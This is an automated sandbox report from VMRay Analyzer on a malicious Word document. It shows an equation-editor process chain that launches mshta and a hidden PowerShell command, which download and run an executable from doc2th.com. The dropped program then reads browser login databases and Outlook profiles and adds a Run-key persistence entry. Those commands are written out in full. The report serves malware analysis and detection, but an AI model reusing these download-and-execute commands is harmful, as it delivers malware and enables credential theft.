VMRay Analyzer Report for Sample #20883 VMRay Analyzer 2.2.0 URI doc2th.com Resolved_To Address 192.232.251.15 Process 1 2396 winword.exe 1552 winword.exe "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\program files\microsoft office\office15\winword.exe Child_Of Process 2 2548 eqnedt32.exe 596 eqnedt32.exe "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding C:\Windows\system32\ c:\program files\common files\microsoft shared\equation\eqnedt32.exe Child_Of Process 3 2584 mshta.exe 2548 mshta.exe mShta http://doc2th.com/tin/foobaz.txt &AAAA��C C:\Windows\system32\ c:\windows\system32\mshta.exe Child_Of Child_Of Created Opened Opened Opened Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 4 1012 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 5 2884 powershell.exe 2584 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe');C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe C:\Windows\system32\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Connected_To Connected_To Connected_To Process 6 2948 lambdoidtegument.exe 2884 lambdoidtegument.exe "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe" C:\Windows\system32\ c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe Child_Of Created Created Opened Opened Opened Created Opened Process 7 1552 explorer.exe 18446744073709551615 explorer.exe C:\Windows\Explorer.EXE C:\Windows\system32\ c:\windows\explorer.exe Child_Of Child_Of Created Created Created Process 8 3028 cmmon32.exe 1552 cmmon32.exe "C:\Windows\System32\cmmon32.exe" C:\Windows\system32\ c:\windows\system32\cmmon32.exe Child_Of Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Modified_Properties_Of Opened Opened Opened Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Process 9 3200 cmd.exe 3028 cmd.exe /c del "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe" C:\Windows\system32\ c:\windows\system32\cmd.exe Deleted Opened Opened Opened Opened Opened Process 10 712 svchost.exe 476 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted C:\Windows\system32\ c:\windows\system32\svchost.exe Process 11 3300 firefox.exe 3028 firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" C:\Windows\system32\ c:\program files\mozilla firefox\firefox.exe Created File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex Local\!PrivacIE!SharedMemory!Mutex WinRegistryKey clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 HKEY_CLASSES_ROOT WinRegistryKey Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\PageSetup HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows Script\Features HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\COM3 HKEY_LOCAL_MACHINE COM+Enabled WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_CURRENT_USER NoFileMenu WinRegistryKey Software\Microsoft\Internet Explorer\PageSetup HKEY_CURRENT_USER Print_Background File conout$ File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\help.format.ps1xml windows\system32\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\registry.format.ps1xml windows\system32\windowspowershell\v1.0\registry.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml ps1xml File windows\microsoft.net\framework\v2.0.50727\config\machine.config windows\microsoft.net\framework\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config config File users\bgc6u8oy yxgxkr\appdata\local\temp\lambdoidtegument.exe users\bgc6u8oy yxgxkr\appdata\local\temp\lambdoidtegument.exe c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\temp\lambdoidtegument.exe exe MD5 437efd63bf864669ef4312750c25c462 SHA1 247f0b1576c24e50830f6ee326dce494c6ba478d SHA256 c5221c1250b9584be4be97a30dde5f1b82c3509749df7bf76a7d0c9d85514a5a File STD_INPUT_HANDLE Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE Library Library IsMultiInstance IsMultiInstance First Counter First Counter WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE CategoryOptions CategoryOptions FileMappingSize FileMappingSize Counter Names WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB DNSRecord doc2th.com SocketAddress 192.232.251.15 80 TCP NetworkSocket 192.232.251.15 80 TCP Contains SocketAddress doc2th.com 80 NetworkConnection HTTP doc2th.com 80 URI doc2th.com/tin/off.exe Contains URI None File Windows\SYSTEM32\ntdll.dll Windows\SYSTEM32\ntdll.dll \??\C:\ \??\C:\Windows\SYSTEM32\ntdll.dll dll File Windows\System32\cmmon32.exe Windows\System32\cmmon32.exe \??\C:\ \??\C:\Windows\System32\cmmon32.exe exe File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex WinRegistryKey SOFTWARE\Microsoft\VBA\Monitors HKEY_LOCAL_MACHINE File Windows\SYSTEM32\ntdll.dll Windows\SYSTEM32\ntdll.dll \??\C:\ \??\C:\Windows\SYSTEM32\ntdll.dll dll File Windows\System32\cmmon32.exe Windows\System32\cmmon32.exe \??\C:\ \??\C:\Windows\System32\cmmon32.exe exe File Windows\SYSTEM32\ntdll.dll Windows\SYSTEM32\ntdll.dll \??\C:\ \??\C:\Windows\SYSTEM32\ntdll.dll dll File Users\BGC6u8Oy yXGxkR\AppData\Roaming\Temp\lambdoidtegument.exe Users\BGC6u8Oy yXGxkR\AppData\Roaming\Temp\lambdoidtegument.exe \??\C:\ \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Temp\lambdoidtegument.exe exe File Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe \??\C:\ \??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe exe File Windows\System32\drivers\etc\hosts Windows\System32\drivers\etc\hosts \??\C:\ \??\C:\Windows\System32\drivers\etc\hosts File Program Files\Crfitq6x\gdigzvh.exe Program Files\Crfitq6x\gdigzvh.exe \??\C:\ \??\C:\Program Files\Crfitq6x\gdigzvh.exe exe File Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS- Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS- \??\C:\ \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS- File Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlog.ini Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlog.ini \??\C:\ \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlog.ini ini File Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini \??\C:\ \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini ini File Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data \??\C:\ \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data File Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data \??\C:\ \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data File Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini \??\C:\ \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini ini File Program Files\Mozilla Firefox\Firefox.exe Program Files\Mozilla Firefox\Firefox.exe \??\C:\ \??\C:\Program Files\Mozilla Firefox\Firefox.exe exe Mutex 664908S9UTEIZ6MN Mutex OLO0NDS-0AXWwKzG WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_USERS VFIL_RNHERNX C:\Program Files\Crfitq6x\gdigzvh.exe REG_SZ WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_USERS WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE ProductName WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox\ HKEY_LOCAL_MACHINE CurrentVersion WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox\25.0 